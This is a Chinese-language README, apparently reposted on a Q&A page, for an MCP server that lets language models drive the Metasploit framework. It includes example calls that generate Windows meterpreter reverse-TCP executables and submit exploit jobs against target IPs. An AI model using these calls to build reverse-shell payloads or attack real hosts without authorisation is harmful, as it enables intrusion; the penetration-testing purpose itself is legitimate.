MetasploitMCP

MetasploitMCP

🚀 MetaSploit MCP 服务器

MetaSploit MCP 服务器将大型语言模型(如Claude)与MetaSploit框架集成,借助标准化工具提供自然语言界面,让AI助手能动态访问和控制MetaSploit功能,极大地简化了复杂的渗透测试工作流程。

🚀 快速开始

此 MCP 服务器为大型语言模型(如Claude)与MetaSploit 框架之间建立了一个桥梁。它使人工智能助手能够直接调用和控制 MetaSploit 的功能,从而实现复杂的安全测试工作流程的自然语言接口。

✨ 主要特性

模块信息

  • 列举 exploits:搜索并列出可用的 MetaSploit 攻击模块。
  • 列举 payloads:搜索并列出可用的攻击载荷。
  • 生成 payload:通过配置参数生成自定义载荷。

📦 安装指南

先决条件

  1. 安装 Python 3.8 或更高版本。
  2. 安装 MetaSploit 框架(推荐使用最新的稳定版)。
  3. 环境变量配置:
    • 设置 MSF_PATH 环境变量指向 MetaSploit 的安装目录。
    • 可选:设置 PAYLOAD_SAVE_DIR 环境变量指定载荷保存路径。

安装步骤

  1. 克隆项目仓库:

    git clone https://github.com/yourusername/metasploit-mcp.git
    cd metasploit-mcp
    
  2. 创建并激活虚拟环境(推荐使用 Python 3 虚拟环境):

    python -m venv mcp-venv
    source mcp-venv/bin/activate  # 对于 Linux/macOS
    mcp-venv\Scripts\activate     # 对于 Windows
    
  3. 安装依赖项:

    pip install -r requirements.txt
    

💻 使用示例

基础用法

启动服务器

python server.py

调用功能示例

# 列举可用的 exploits
list_exploits()

# 生成自定义 payload
generate_payload(exploit_type="windows/meterpreter/reverse_tcp",
output_format="exe",
parameters={"LHOST": "192.168.1.10", "LPORT": 4444})

# 提交攻击任务
submit_job(exploit_id=1, target_hosts=["192.168.1.100"], payload_id=1)

高级用法

攻击模块测试

# 列举可用的 exploits
list_exploits()  # 返回所有可用 exploit 的列表
# 生成自定义 payload
generate_payload(exploit_type="windows/x64/meterpreter/reverse_tcp",
output_format="exe",
parameters={"LHOST": "192.168.1.1", "LPORT": 4444})
# 提交攻击任务
submit_job(exploit_id=1, target_hosts=["192.168.1.100"], payload_id=1)

任务管理

# 查看所有任务
list_jobs()  # 返回所有正在运行和已完成的任务列表
# 终止特定任务
terminate_job(job_id=1)  # 中止指定任务 ID 的执行

📚 详细文档

配置选项

载荷保存目录

默认情况下,生成的载荷将保存到用户主目录下的 payloads 文件夹中。您可以通过设置 PAYLOAD_SAVE_DIR 环境变量自定义此路径:

设置方法

  • Windows (PowerShell)
$env:PAYLOAD_SAVE_DIR = "C:\custom\path\to\payloads"
  • Windows (Command Prompt)
set PAYLOAD_SAVE_DIR=C:\custom\path\to\payloads
  • Linux/macOS
export PAYLOAD_SAVE_DIR=/custom/path/to/payloads
  • 通过配置文件指定
{
"env": {
"MSF_PATH": "/opt/metasploit",
"PAYLOAD_SAVE_DIR": "/var/custom/payloads"
}
}

注意:如果您指定的路径不存在,程序将尝试自动创建它。如果无法创建,请确保应用程序有权限访问该目录。

安全注意事项

  1. 权限管理
    • 确保 MCP 服务器运行在最小权限账户下。
    • 配置防火墙限制外部访问。
  2. 日志监控
    • 启用详细的审计日志记录。
    • 定期审查操作日志。
  3. 安全更新
    • 及时更新 MetaSploit 框架到最新版本。
    • 定期扫描和修复服务器漏洞。

📄 许可证

本项目遵循 Apache 2.0 许可证协议。

  • 0 关注
  • 0 收藏,20 浏览
  • system 提出于 2025-09-30 02:00

相似服务问题

相关AI产品